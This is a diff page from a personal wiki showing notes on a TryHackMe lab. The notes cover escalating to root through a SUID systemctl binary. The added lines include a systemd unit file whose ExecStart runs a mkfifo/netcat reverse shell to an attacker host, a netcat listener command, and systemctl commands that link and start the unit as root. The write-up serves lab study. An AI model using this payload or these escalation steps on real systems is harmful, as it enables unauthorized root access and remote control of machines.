The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » prac_app_tryhackme
prac_app_tryhackme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
prac_app_tryhackme [2022/09/24 19:01] gmanprac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 81: Line 81:
  
 **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]] **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
 +
 +===== Exploit =====
  
 [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE. [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
Line 110: Line 112:
  
 <code>ls -lah /tmp</code> <code>ls -lah /tmp</code>
 +
 +===== Alternative Exploit =====
  
 **To get a reverse root shell:** **To get a reverse root shell:**
Line 121: Line 125:
  
   * Create your unit file:   * Create your unit file:
-<code> 
  
 +<code>
 +echo '[Service]
 +Type=oneshot
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
 +[Install]
 +WantedBy=multi-user.target' > gk.service
 </code> </code>
 +
   * Open a listener on your attack machine:   * Open a listener on your attack machine:
-<code> 
  
-</code>+<code>nc -lvnp 7777</code> 
   * Link and start the service:   * Link and start the service:
 +
 <code> <code>
 +/bin/systemctl link /tmp/gk.service         # need the full path 
 +/bin/systemctl enable --now /tmp/gk.service
 </code> </code>
  
prac_app_tryhackme.1664046100.txt.gz · Last modified: by gman